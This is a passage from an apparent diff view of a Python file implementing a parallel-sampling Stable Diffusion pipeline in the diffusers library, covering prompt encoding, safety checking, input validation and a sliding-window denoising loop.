The prompt or prompts not to guide the image generation. If not defined, one has to pass
|
231 |
-
`negative_prompt_embeds` instead. Ignored when not using guidance (i.e., ignored if `guidance_scale` is
|
232 |
-
less than `1`).
|
233 |
-
prompt_embeds (`torch.FloatTensor`, *optional*):
|
234 |
-
Pre-generated text embeddings. Can be used to easily tweak text inputs, *e.g.* prompt weighting. If not
|
235 |
-
provided, text embeddings will be generated from `prompt` input argument.
|
236 |
-
negative_prompt_embeds (`torch.FloatTensor`, *optional*):
|
237 |
-
Pre-generated negative text embeddings. Can be used to easily tweak text inputs, *e.g.* prompt
|
238 |
-
weighting. If not provided, negative_prompt_embeds will be generated from `negative_prompt` input
|
239 |
-
argument.
|
240 |
-
lora_scale (`float`, *optional*):
|
241 |
-
A lora scale that will be applied to all LoRA layers of the text encoder if LoRA layers are loaded.
|
242 |
-
"""
|
243 |
-
# set lora scale so that monkey patched LoRA
|
244 |
-
# function of text encoder can correctly access it
|
245 |
-
if lora_scale is not None and isinstance(self, LoraLoaderMixin):
|
246 |
-
self._lora_scale = lora_scale
|
247 |
-
|
248 |
-
if prompt is not None and isinstance(prompt, str):
|
249 |
-
batch_size = 1
|
250 |
-
elif prompt is not None and isinstance(prompt, list):
|
251 |
-
batch_size = len(prompt)
|
252 |
-
else:
|
253 |
-
batch_size = prompt_embeds.shape[0]
|
254 |
-
|
255 |
-
if prompt_embeds is None:
|
256 |
-
# textual inversion: procecss multi-vector tokens if necessary
|
257 |
-
if isinstance(self, TextualInversionLoaderMixin):
|
258 |
-
prompt = self.maybe_convert_prompt(prompt, self.tokenizer)
|
259 |
-
|
260 |
-
text_inputs = self.tokenizer(
|
261 |
-
prompt,
|
262 |
-
padding="max_length",
|
263 |
-
max_length=self.tokenizer.model_max_length,
|
264 |
-
truncation=True,
|
265 |
-
return_tensors="pt",
|
266 |
-
)
|
267 |
-
text_input_ids = text_inputs.input_ids
|
268 |
-
untruncated_ids = self.tokenizer(prompt, padding="longest", return_tensors="pt").input_ids
|
269 |
-
|
270 |
-
if untruncated_ids.shape[-1] >= text_input_ids.shape[-1] and not torch.equal(
|
271 |
-
text_input_ids, untruncated_ids
|
272 |
-
):
|
273 |
-
removed_text = self.tokenizer.batch_decode(
|
274 |
-
untruncated_ids[:, self.tokenizer.model_max_length - 1 : -1]
|
275 |
-
)
|
276 |
-
logger.warning(
|
277 |
-
"The following part of your input was truncated because CLIP can only handle sequences up to"
|
278 |
-
f" {self.tokenizer.model_max_length} tokens: {removed_text}"
|
279 |
-
)
|
280 |
-
|
281 |
-
if hasattr(self.text_encoder.config, "use_attention_mask") and self.text_encoder.config.use_attention_mask:
|
282 |
-
attention_mask = text_inputs.attention_mask.to(device)
|
283 |
-
else:
|
284 |
-
attention_mask = None
|
285 |
-
|
286 |
-
prompt_embeds = self.text_encoder(
|
287 |
-
text_input_ids.to(device),
|
288 |
-
attention_mask=attention_mask,
|
289 |
-
)
|
290 |
-
prompt_embeds = prompt_embeds[0]
|
291 |
-
|
292 |
-
prompt_embeds = prompt_embeds.to(dtype=self.text_encoder.dtype, device=device)
|
293 |
-
|
294 |
-
bs_embed, seq_len, _ = prompt_embeds.shape
|
295 |
-
# duplicate text embeddings for each generation per prompt, using mps friendly method
|
296 |
-
prompt_embeds = prompt_embeds.repeat(1, num_images_per_prompt, 1)
|
297 |
-
prompt_embeds = prompt_embeds.view(bs_embed * num_images_per_prompt, seq_len, -1)
|
298 |
-
|
299 |
-
# get unconditional embeddings for classifier free guidance
|
300 |
-
if do_classifier_free_guidance and negative_prompt_embeds is None:
|
301 |
-
uncond_tokens: List[str]
|
302 |
-
if negative_prompt is None:
|
303 |
-
uncond_tokens = [""] * batch_size
|
304 |
-
elif prompt is not None and type(prompt) is not type(negative_prompt):
|
305 |
-
raise TypeError(
|
306 |
-
f"`negative_prompt` should be the same type to `prompt`, but got {type(negative_prompt)} !="
|
307 |
-
f" {type(prompt)}."
|
308 |
-
)
|
309 |
-
elif isinstance(negative_prompt, str):
|
310 |
-
uncond_tokens = [negative_prompt]
|
311 |
-
elif batch_size != len(negative_prompt):
|
312 |
-
raise ValueError(
|
313 |
-
f"`negative_prompt`: {negative_prompt} has batch size {len(negative_prompt)}, but `prompt`:"
|
314 |
-
f" {prompt} has batch size {batch_size}. Please make sure that passed `negative_prompt` matches"
|
315 |
-
" the batch size of `prompt`."
|
316 |
-
)
|
317 |
-
else:
|
318 |
-
uncond_tokens = negative_prompt
|
319 |
-
|
320 |
-
# textual inversion: procecss multi-vector tokens if necessary
|
321 |
-
if isinstance(self, TextualInversionLoaderMixin):
|
322 |
-
uncond_tokens = self.maybe_convert_prompt(uncond_tokens, self.tokenizer)
|
323 |
-
|
324 |
-
max_length = prompt_embeds.shape[1]
|
325 |
-
uncond_input = self.tokenizer(
|
326 |
-
uncond_tokens,
|
327 |
-
padding="max_length",
|
328 |
-
max_length=max_length,
|
329 |
-
truncation=True,
|
330 |
-
return_tensors="pt",
|
331 |
-
)
|
332 |
-
|
333 |
-
if hasattr(self.text_encoder.config, "use_attention_mask") and self.text_encoder.config.use_attention_mask:
|
334 |
-
attention_mask = uncond_input.attention_mask.to(device)
|
335 |
-
else:
|
336 |
-
attention_mask = None
|
337 |
-
|
338 |
-
negative_prompt_embeds = self.text_encoder(
|
339 |
-
uncond_input.input_ids.to(device),
|
340 |
-
attention_mask=attention_mask,
|
341 |
-
)
|
342 |
-
negative_prompt_embeds = negative_prompt_embeds[0]
|
343 |
-
|
344 |
-
if do_classifier_free_guidance:
|
345 |
-
# duplicate unconditional embeddings for each generation per prompt, using mps friendly method
|
346 |
-
seq_len = negative_prompt_embeds.shape[1]
|
347 |
-
|
348 |
-
negative_prompt_embeds = negative_prompt_embeds.to(dtype=self.text_encoder.dtype, device=device)
|
349 |
-
|
350 |
-
negative_prompt_embeds = negative_prompt_embeds.repeat(1, num_images_per_prompt, 1)
|
351 |
-
negative_prompt_embeds = negative_prompt_embeds.view(batch_size * num_images_per_prompt, seq_len, -1)
|
352 |
-
|
353 |
-
# For classifier free guidance, we need to do two forward passes.
|
354 |
-
# Here we concatenate the unconditional and text embeddings into a single batch
|
355 |
-
# to avoid doing two forward passes
|
356 |
-
prompt_embeds = torch.cat([negative_prompt_embeds, prompt_embeds])
|
357 |
-
|
358 |
-
return prompt_embeds
|
359 |
-
|
360 |
-
# Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.run_safety_checker
|
361 |
-
def run_safety_checker(self, image, device, dtype):
|
362 |
-
if self.safety_checker is None:
|
363 |
-
has_nsfw_concept = None
|
364 |
-
else:
|
365 |
-
if torch.is_tensor(image):
|
366 |
-
feature_extractor_input = self.image_processor.postprocess(image, output_type="pil")
|
367 |
-
else:
|
368 |
-
feature_extractor_input = self.image_processor.numpy_to_pil(image)
|
369 |
-
safety_checker_input = self.feature_extractor(feature_extractor_input, return_tensors="pt").to(device)
|
370 |
-
image, has_nsfw_concept = self.safety_checker(
|
371 |
-
images=image, clip_input=safety_checker_input.pixel_values.to(dtype)
|
372 |
-
)
|
373 |
-
return image, has_nsfw_concept
|
374 |
-
|
375 |
-
# Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.prepare_extra_step_kwargs
|
376 |
-
def prepare_extra_step_kwargs(self, generator, eta):
|
377 |
-
# prepare extra kwargs for the scheduler step, since not all schedulers have the same signature
|
378 |
-
# eta (η) is only used with the DDIMScheduler, it will be ignored for other schedulers.
|
379 |
-
# eta corresponds to η in DDIM paper: https://arxiv.org/abs/2010.02502
|
380 |
-
# and should be between [0, 1]
|
381 |
-
|
382 |
-
accepts_eta = "eta" in set(inspect.signature(self.scheduler.step).parameters.keys())
|
383 |
-
extra_step_kwargs = {}
|
384 |
-
if accepts_eta:
|
385 |
-
extra_step_kwargs["eta"] = eta
|
386 |
-
|
387 |
-
# check if the scheduler accepts generator
|
388 |
-
accepts_generator = "generator" in set(inspect.signature(self.scheduler.step).parameters.keys())
|
389 |
-
if accepts_generator:
|
390 |
-
extra_step_kwargs["generator"] = generator
|
391 |
-
return extra_step_kwargs
|
392 |
-
|
393 |
-
# Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.check_inputs
|
394 |
-
def check_inputs(
|
395 |
-
self,
|
396 |
-
prompt,
|
397 |
-
height,
|
398 |
-
width,
|
399 |
-
callback_steps,
|
400 |
-
negative_prompt=None,
|
401 |
-
prompt_embeds=None,
|
402 |
-
negative_prompt_embeds=None,
|
403 |
-
):
|
404 |
-
if height % 8 != 0 or width % 8 != 0:
|
405 |
-
raise ValueError(f"`height` and `width` have to be divisible by 8 but are {height} and {width}.")
|
406 |
-
|
407 |
-
if (callback_steps is None) or (
|
408 |
-
callback_steps is not None and (not isinstance(callback_steps, int) or callback_steps <= 0)
|
409 |
-
):
|
410 |
-
raise ValueError(
|
411 |
-
f"`callback_steps` has to be a positive integer but is {callback_steps} of type"
|
412 |
-
f" {type(callback_steps)}."
|
413 |
-
)
|
414 |
-
|
415 |
-
if prompt is not None and prompt_embeds is not None:
|
416 |
-
raise ValueError(
|
417 |
-
f"Cannot forward both `prompt`: {prompt} and `prompt_embeds`: {prompt_embeds}. Please make sure to"
|
418 |
-
" only forward one of the two."
|
419 |
-
)
|
420 |
-
elif prompt is None and prompt_embeds is None:
|
421 |
-
raise ValueError(
|
422 |
-
"Provide either `prompt` or `prompt_embeds`. Cannot leave both `prompt` and `prompt_embeds` undefined."
|
423 |
-
)
|
424 |
-
elif prompt is not None and (not isinstance(prompt, str) and not isinstance(prompt, list)):
|
425 |
-
raise ValueError(f"`prompt` has to be of type `str` or `list` but is {type(prompt)}")
|
426 |
-
|
427 |
-
if negative_prompt is not None and negative_prompt_embeds is not None:
|
428 |
-
raise ValueError(
|
429 |
-
f"Cannot forward both `negative_prompt`: {negative_prompt} and `negative_prompt_embeds`:"
|
430 |
-
f" {negative_prompt_embeds}. Please make sure to only forward one of the two."
|
431 |
-
)
|
432 |
-
|
433 |
-
if prompt_embeds is not None and negative_prompt_embeds is not None:
|
434 |
-
if prompt_embeds.shape != negative_prompt_embeds.shape:
|
435 |
-
raise ValueError(
|
436 |
-
"`prompt_embeds` and `negative_prompt_embeds` must have the same shape when passed directly, but"
|
437 |
-
f" got: `prompt_embeds` {prompt_embeds.shape} != `negative_prompt_embeds`"
|
438 |
-
f" {negative_prompt_embeds.shape}."
|
439 |
-
)
|
440 |
-
|
441 |
-
# Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.prepare_latents
|
442 |
-
def prepare_latents(self, batch_size, num_channels_latents, height, width, dtype, device, generator, latents=None):
|
443 |
-
shape = (batch_size, num_channels_latents, height // self.vae_scale_factor, width // self.vae_scale_factor)
|
444 |
-
if isinstance(generator, list) and len(generator) != batch_size:
|
445 |
-
raise ValueError(
|
446 |
-
f"You have passed a list of generators of length {len(generator)}, but requested an effective batch"
|
447 |
-
f" size of {batch_size}. Make sure the batch size matches the length of the generators."
|
448 |
-
)
|
449 |
-
|
450 |
-
if latents is None:
|
451 |
-
latents = randn_tensor(shape, generator=generator, device=device, dtype=dtype)
|
452 |
-
else:
|
453 |
-
latents = latents.to(device)
|
454 |
-
|
455 |
-
# scale the initial noise by the standard deviation required by the scheduler
|
456 |
-
latents = latents * self.scheduler.init_noise_sigma
|
457 |
-
return latents
|
458 |
-
|
459 |
-
def _cumsum(self, input, dim, debug=False):
|
460 |
-
if debug:
|
461 |
-
# cumsum_cuda_kernel does not have a deterministic implementation
|
462 |
-
# so perform cumsum on cpu for debugging purposes
|
463 |
-
return torch.cumsum(input.cpu().float(), dim=dim).to(input.device)
|
464 |
-
else:
|
465 |
-
return torch.cumsum(input, dim=dim)
|
466 |
-
|
467 |
-
@torch.no_grad()
|
468 |
-
@replace_example_docstring(EXAMPLE_DOC_STRING)
|
469 |
-
def __call__(
|
470 |
-
self,
|
471 |
-
prompt: Union[str, List[str]] = None,
|
472 |
-
height: Optional[int] = None,
|
473 |
-
width: Optional[int] = None,
|
474 |
-
num_inference_steps: int = 50,
|
475 |
-
parallel: int = 10,
|
476 |
-
tolerance: float = 0.1,
|
477 |
-
guidance_scale: float = 7.5,
|
478 |
-
negative_prompt: Optional[Union[str, List[str]]] = None,
|
479 |
-
num_images_per_prompt: Optional[int] = 1,
|
480 |
-
eta: float = 0.0,
|
481 |
-
generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,
|
482 |
-
latents: Optional[torch.FloatTensor] = None,
|
483 |
-
prompt_embeds: Optional[torch.FloatTensor] = None,
|
484 |
-
negative_prompt_embeds: Optional[torch.FloatTensor] = None,
|
485 |
-
output_type: Optional[str] = "pil",
|
486 |
-
return_dict: bool = True,
|
487 |
-
callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None,
|
488 |
-
callback_steps: int = 1,
|
489 |
-
cross_attention_kwargs: Optional[Dict[str, Any]] = None,
|
490 |
-
debug: bool = False,
|
491 |
-
):
|
492 |
-
r"""
|
493 |
-
The call function to the pipeline for generation.
|
494 |
-
|
495 |
-
Args:
|
496 |
-
prompt (`str` or `List[str]`, *optional*):
|
497 |
-
The prompt or prompts to guide image generation. If not defined, you need to pass `prompt_embeds`.
|
498 |
-
height (`int`, *optional*, defaults to `self.unet.config.sample_size * self.vae_scale_factor`):
|
499 |
-
The height in pixels of the generated image.
|
500 |
-
width (`int`, *optional*, defaults to `self.unet.config.sample_size * self.vae_scale_factor`):
|
501 |
-
The width in pixels of the generated image.
|
502 |
-
num_inference_steps (`int`, *optional*, defaults to 50):
|
503 |
-
The number of denoising steps. More denoising steps usually lead to a higher quality image at the
|
504 |
-
expense of slower inference.
|
505 |
-
parallel (`int`, *optional*, defaults to 10):
|
506 |
-
The batch size to use when doing parallel sampling. More parallelism may lead to faster inference but
|
507 |
-
requires higher memory usage and can also require more total FLOPs.
|
508 |
-
tolerance (`float`, *optional*, defaults to 0.1):
|
509 |
-
The error tolerance for determining when to slide the batch window forward for parallel sampling. Lower
|
510 |
-
tolerance usually leads to less or no degradation. Higher tolerance is faster but can risk degradation
|
511 |
-
of sample quality. The tolerance is specified as a ratio of the scheduler's noise magnitude.
|
512 |
-
guidance_scale (`float`, *optional*, defaults to 7.5):
|
513 |
-
A higher guidance scale value encourages the model to generate images closely linked to the text
|
514 |
-
`prompt` at the expense of lower image quality. Guidance scale is enabled when `guidance_scale > 1`.
|
515 |
-
negative_prompt (`str` or `List[str]`, *optional*):
|
516 |
-
The prompt or prompts to guide what to not include in image generation. If not defined, you need to
|
517 |
-
pass `negative_prompt_embeds` instead. Ignored when not using guidance (`guidance_scale < 1`).
|
518 |
-
num_images_per_prompt (`int`, *optional*, defaults to 1):
|
519 |
-
The number of images to generate per prompt.
|
520 |
-
eta (`float`, *optional*, defaults to 0.0):
|
521 |
-
Corresponds to parameter eta (η) from the [DDIM](https://arxiv.org/abs/2010.02502) paper. Only applies
|
522 |
-
to the [`~schedulers.DDIMScheduler`], and is ignored in other schedulers.
|
523 |
-
generator (`torch.Generator` or `List[torch.Generator]`, *optional*):
|
524 |
-
A [`torch.Generator`](https://pytorch.org/docs/stable/generated/torch.Generator.html) to make
|
525 |
-
generation deterministic.
|
526 |
-
latents (`torch.FloatTensor`, *optional*):
|
527 |
-
Pre-generated noisy latents sampled from a Gaussian distribution, to be used as inputs for image
|
528 |
-
generation. Can be used to tweak the same generation with different prompts. If not provided, a latents
|
529 |
-
tensor is generated by sampling using the supplied random `generator`.
|
530 |
-
prompt_embeds (`torch.FloatTensor`, *optional*):
|
531 |
-
Pre-generated text embeddings. Can be used to easily tweak text inputs (prompt weighting). If not
|
532 |
-
provided, text embeddings are generated from the `prompt` input argument.
|
533 |
-
negative_prompt_embeds (`torch.FloatTensor`, *optional*):
|
534 |
-
Pre-generated negative text embeddings. Can be used to easily tweak text inputs (prompt weighting). If
|
535 |
-
not provided, `negative_prompt_embeds` are generated from the `negative_prompt` input argument.
|
536 |
-
output_type (`str`, *optional*, defaults to `"pil"`):
|
537 |
-
The output format of the generated image. Choose between `PIL.Image` or `np.array`.
|
538 |
-
return_dict (`bool`, *optional*, defaults to `True`):
|
539 |
-
Whether or not to return a [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] instead of a
|
540 |
-
plain tuple.
|
541 |
-
callback (`Callable`, *optional*):
|
542 |
-
A function that calls every `callback_steps` steps during inference. The function is called with the
|
543 |
-
following arguments: `callback(step: int, timestep: int, latents: torch.FloatTensor)`.
|
544 |
-
callback_steps (`int`, *optional*, defaults to 1):
|
545 |
-
The frequency at which the `callback` function is called. If not specified, the callback is called at
|
546 |
-
every step.
|
547 |
-
cross_attention_kwargs (`dict`, *optional*):
|
548 |
-
A kwargs dictionary that if specified is passed along to the [`AttentionProcessor`] as defined in
|
549 |
-
[`self.processor`](https://github.com/huggingface/diffusers/blob/main/src/diffusers/models/cross_attention.py).
|
550 |
-
debug (`bool`, *optional*, defaults to `False`):
|
551 |
-
Whether or not to run in debug mode. In debug mode, `torch.cumsum` is evaluated using the CPU.
|
552 |
-
|
553 |
-
Examples:
|
554 |
-
|
555 |
-
Returns:
|
556 |
-
[`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] or `tuple`:
|
557 |
-
If `return_dict` is `True`, [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] is returned,
|
558 |
-
otherwise a `tuple` is returned where the first element is a list with the generated images and the
|
559 |
-
second element is a list of `bool`s indicating whether the corresponding generated image contains
|
560 |
-
"not-safe-for-work" (nsfw) content.
|
561 |
-
"""
|
562 |
-
# 0. Default height and width to unet
|
563 |
-
height = height or self.unet.config.sample_size * self.vae_scale_factor
|
564 |
-
width = width or self.unet.config.sample_size * self.vae_scale_factor
|
565 |
-
|
566 |
-
# 1. Check inputs. Raise error if not correct
|
567 |
-
self.check_inputs(
|
568 |
-
prompt, height, width, callback_steps, negative_prompt, prompt_embeds, negative_prompt_embeds
|
569 |
-
)
|
570 |
-
|
571 |
-
# 2. Define call parameters
|
572 |
-
if prompt is not None and isinstance(prompt, str):
|
573 |
-
batch_size = 1
|
574 |
-
elif prompt is not None and isinstance(prompt, list):
|
575 |
-
batch_size = len(prompt)
|
576 |
-
else:
|
577 |
-
batch_size = prompt_embeds.shape[0]
|
578 |
-
|
579 |
-
device = self._execution_device
|
580 |
-
# here `guidance_scale` is defined analog to the guidance weight `w` of equation (2)
|
581 |
-
# of the Imagen paper: https://arxiv.org/pdf/2205.11487.pdf . `guidance_scale = 1`
|
582 |
-
# corresponds to doing no classifier free guidance.
|
583 |
-
do_classifier_free_guidance = guidance_scale > 1.0
|
584 |
-
|
585 |
-
# 3. Encode input prompt
|
586 |
-
prompt_embeds = self._encode_prompt(
|
587 |
-
prompt,
|
588 |
-
device,
|
589 |
-
num_images_per_prompt,
|
590 |
-
do_classifier_free_guidance,
|
591 |
-
negative_prompt,
|
592 |
-
prompt_embeds=prompt_embeds,
|
593 |
-
negative_prompt_embeds=negative_prompt_embeds,
|
594 |
-
)
|
595 |
-
|
596 |
-
# 4. Prepare timesteps
|
597 |
-
self.scheduler.set_timesteps(num_inference_steps, device=device)
|
598 |
-
|
599 |
-
# 5. Prepare latent variables
|
600 |
-
num_channels_latents = self.unet.config.in_channels
|
601 |
-
latents = self.prepare_latents(
|
602 |
-
batch_size * num_images_per_prompt,
|
603 |
-
num_channels_latents,
|
604 |
-
height,
|
605 |
-
width,
|
606 |
-
prompt_embeds.dtype,
|
607 |
-
device,
|
608 |
-
generator,
|
609 |
-
latents,
|
610 |
-
)
|
611 |
-
|
612 |
-
# 6. Prepare extra step kwargs. TODO: Logic should ideally just be moved out of the pipeline
|
613 |
-
extra_step_kwargs = self.prepare_extra_step_kwargs(generator, eta)
|
614 |
-
extra_step_kwargs.pop("generator", None)
|
615 |
-
|
616 |
-
# # 7. Denoising loop
|
617 |
-
scheduler = self.scheduler
|
618 |
-
parallel = min(parallel, len(scheduler.timesteps))
|
619 |
-
|
620 |
-
begin_idx = 0
|
621 |
-
end_idx = parallel
|
622 |
-
latents_time_evolution_buffer = torch.stack([latents] * (len(scheduler.timesteps) + 1))
|
623 |
-
|
624 |
-
# We must make sure the noise of stochastic schedulers such as DDPM is sampled only once per timestep.
|
625 |
-
# Sampling inside the parallel denoising loop will mess this up, so we pre-sample the noise vectors outside the denoising loop.
|
626 |
-
noise_array = torch.zeros_like(latents_time_evolution_buffer)
|
627 |
-
for j in range(len(scheduler.timesteps)):
|
628 |
-
base_noise = randn_tensor(
|
629 |
-
shape=latents.shape, generator=generator, device=latents.device, dtype=prompt_embeds.dtype
|
630 |
-
)
|
631 |
-
noise = (self.scheduler._get_variance(scheduler.timesteps[j]) ** 0.5) * base_noise
|
632 |
-
noise_array[j] = noise.clone()
|
633 |
-
|
634 |
-
# We specify the error tolerance as a ratio of the scheduler's noise magnitude. We similarly compute the error tolerance
|
635 |
-
# outside of the denoising loop to avoid recomputing it at every step.
|
636 |
-
# We will be dividing the norm of the noise, so we store its inverse here to avoid a division at every step.
|
637 |
-
inverse_variance_norm = 1.0 / torch.tensor(
|
638 |
-
[scheduler._get_variance(scheduler.timesteps[j]) for j in range(len(scheduler.timesteps))] + [0]
|
639 |
-
).to(noise_array.device)
|
640 |
-
latent_dim = noise_array[0, 0].numel()
|
641 |
-
inverse_variance_norm = inverse_variance_norm[:, None] / latent_dim
|
642 |
-
|
643 |
-
scaled_tolerance = tolerance**2
|
644 |
-
|
645 |
-
with self.progress_bar(total=num_inference_steps) as progress_bar:
|
646 |
-
steps = 0
|
647 |
-
while begin_idx < len(scheduler.timesteps):
|
648 |
-
# these have shape (parallel_dim, 2*batch_size, ...)
|
649 |
-
# parallel_len is at most parallel, but could be less if we are at the end of the timesteps
|
650 |
-
# we are processing batch window of timesteps spanning [begin_idx, end_idx)
|
651 |
-
parallel_len = end_idx - begin_idx
|
652 |
-
|
653 |
-
block_prompt_embeds = torch.stack([prompt_embeds] * parallel_len)
|
654 |
-
block_latents = latents_time_evolution_buffer[begin_idx:end_idx]
|
655 |
-
block_t = scheduler.timesteps[begin_idx:end_idx, None].repeat(1, batch_size * num_images_per_prompt)
|
656 |
-
t_vec = block_t
|
657 |
-
if do_classifier_free_guidance:
|
658 |
-
t_vec = t_vec.repeat(1, 2)
|
659 |
-
|
660 |
-
# expand the latents if we are doing classifier free guidance
|
661 |
-
latent_model_input = (
|
662 |
-
torch.cat([block_latents] * 2, dim=1) if do_classifier_free_guidance else block_latents
|
663 |
-
)
|
664 |
-
latent_model_input = self.scheduler.scale_model_input(latent_model_input, t_vec)
|
665 |
-
|
666 |
-
# if parallel_len is small, no need to use multiple GPUs
|
667 |
-
net = self.wrapped_unet if parallel_len > 3 else self.unet
|
668 |
-
# predict the noise residual, shape is now [parallel_len * 2 * batch_size * num_images_per_prompt, ...]
|
669 |
-
model_output = net(
|
670 |
-
latent_model_input.flatten(0, 1),
|
671 |
-
t_vec.flatten(0, 1),
|
672 |
-
encoder_hidden_states=block_prompt_embeds.flatten(0, 1),
|
673 |
-
cross_attention_kwargs=cross_attention_kwargs,
|
674 |
-
return_dict=False,
|
675 |
-
)[0]
|
676 |
-
|
677 |
-
per_latent_shape = model_output.shape[1:]
|
678 |
-
if do_classifier_free_guidance:
|
679 |
-
model_output = model_output.reshape(
|
680 |
-
parallel_len, 2, batch_size * num_images_per_prompt, *per_latent_shape
|
681 |
-
)
|
682 |
-
noise_pred_uncond, noise_pred_text = model_output[:, 0], model_output[:, 1]
|
683 |
-
model_output = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond)
|
684 |
-
model_output = model_output.reshape(
|
685 |
-
parallel_len * batch_size * num_images_per_prompt, *per_latent_shape
|
686 |
-
)
|
687 |
-
|
688 |
-
block_latents_denoise = scheduler.batch_step_no_noise(
|
689 |
-
model_output=model_output,
|
690 |
-
timesteps=block_t.flatten(0, 1),
|
691 |
-
sample=block_latents.flatten(0, 1),
|
692 |
-
**extra_step_kwargs,
|
693 |
-
).reshape(block_latents.shape)
|
694 |
-
|
695 |
-
# back to shape (parallel_dim, batch_size, ...)
|
696 |
-
# now we want to add the pre-sampled noise
|
697 |
-
# parallel sampling algorithm requires computing the cumulative drift from the beginning
|
698 |
-
# of the window, so we need to compute cumulative sum of the deltas and the pre-sampled noises.
|
699 |
-
delta = block_latents_denoise - block_latents
|
700 |
-
cumulative_delta = self._cumsum(delta, dim=0, debug=debug)
|
701 |
-
cumulative_noise = self._cumsum(noise_array[begin_idx:end_idx], dim=0, debug=debug)
|
702 |
-
|
703 |
-
# if we are using an ODE-like scheduler (like DDIM), we don't want to add noise
|
704 |
-
if scheduler._is_ode_scheduler:
|
705 |
-
cumulative_noise = 0
|
706 |
-
|
707 |
-
block_latents_new = (
|
708 |
-
latents_time_evolution_buffer[begin_idx][None,] + cumulative_delta + cumulative_noise
|
709 |
-
)
|
710 |
-
cur_error = torch.linalg.norm(
|
711 |
-
(block_latents_new - latents_time_evolution_buffer[begin_idx + 1 : end_idx + 1]).reshape(
|
712 |
-
parallel_len, batch_size * num_images_per_prompt, -1
|
713 |
-
),
|
714 |
-
dim=-1,
|
715 |
-
).pow(2)
|
716 |
-
error_ratio = cur_error * inverse_variance_norm[begin_idx + 1 : end_idx + 1]
|
717 |
-
|
718 |
-
# find the first index of the vector error_ratio that is greater than error tolerance
|
719 |
-
# we can shift the window for the next iteration up to this index
|
720 |
-
error_ratio = torch.nn.functional.pad(
|
721 |
-
error_ratio, (0, 0, 0, 1), value=1e9
|
722 |
-
) # handle the case when everything is below ratio, by padding the end of parallel_len dimension
|
723 |
-
any_error_at_time = torch.max(error_ratio > scaled_tolerance, dim=1).values.int()
|
724 |
-
ind = torch.argmax(any_error_at_time).item()
|
725 |
-
|
726 |
-
# compute the new begin and end idxs for the window
|
727 |
-
new_begin_idx = begin_idx + min(1 + ind, parallel)
|
728 |
-
new_end_idx = min(new_begin_idx + parallel, len(scheduler.timesteps))
|
729 |
-
|
730 |
-
# store the computed latents for the current window in the global buffer
|
731 |
-
latents_time_evolution_buffer[begin_idx + 1 : end_idx + 1] = block_latents_new
|
732 |
-
# initialize the new sliding window latents with the end of the current window,
|
733 |
-
# should be better than random initialization
|
734 |
-
latents_time_evolution_buffer[end_idx : new_end_idx + 1] = latents_time_evolution_buffer[end_idx][
|
735 |
-
None,
|
736 |
-
]
|
737 |
-
|
738 |
-
steps += 1
|
739 |
-
|
740 |
-
progress_bar.update(new_begin_idx - begin_idx)
|
741 |
-
if callback is not None and steps % callback_steps == 0:
|
742 |
-
callback(begin_idx, block_t[begin_idx], latents_time_evolution_buffer[begin_idx])
|
743 |
-
|
744 |
-
begin_idx = new_begin_idx
|
745 |
-
end_idx = new_end_idx
|
746 |
-
|
747 |
-
latents = latents_time_evolution_buffer[-1]
|
748 |
-
|
749 |
-
if not output_type == "latent":
|
750 |
-
image = self.vae.decode(latents / self.vae.config.scaling_factor, return_dict=False)[0]
|
751 |
-
image, has_nsfw_concept = self.run_safety_checker(image, device, prompt_embeds.dtype)
|
752 |
-
else:
|
753 |
-
image = latents
|
754 |
-
has_nsfw_concept = None
|
755 |
-
|
756 |
-
if has_nsfw_concept is None:
|
757 |
-
do_denormalize = [True] * image.shape[0]
|
758 |
-
else:
|
759 |
-
do_denormalize = [not has_nsfw for has_nsfw in has_nsfw_concept]
|
760 |
-
|
761 |
-
image = self.image_processor.postprocess(image, output_type=output_type, do_denormalize=do_denormalize)
|
762 |
-
|
763 |
-
# Offload last model to CPU
|
764 |
-
if hasattr(self, "final_offload_hook") and self.final_offload_hook is not None:
|
765 |
-
self.final_offload_hook.offload()
|
766 |
-
|
767 |
-
if not return_dict:
|
768 |
-
return (image, has_nsfw_concept)
|
769 |
-
|
770 |
-
return StableDiffusionPipelineOutput(images=image, nsfw_content_detected=has_nsfw_concept)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
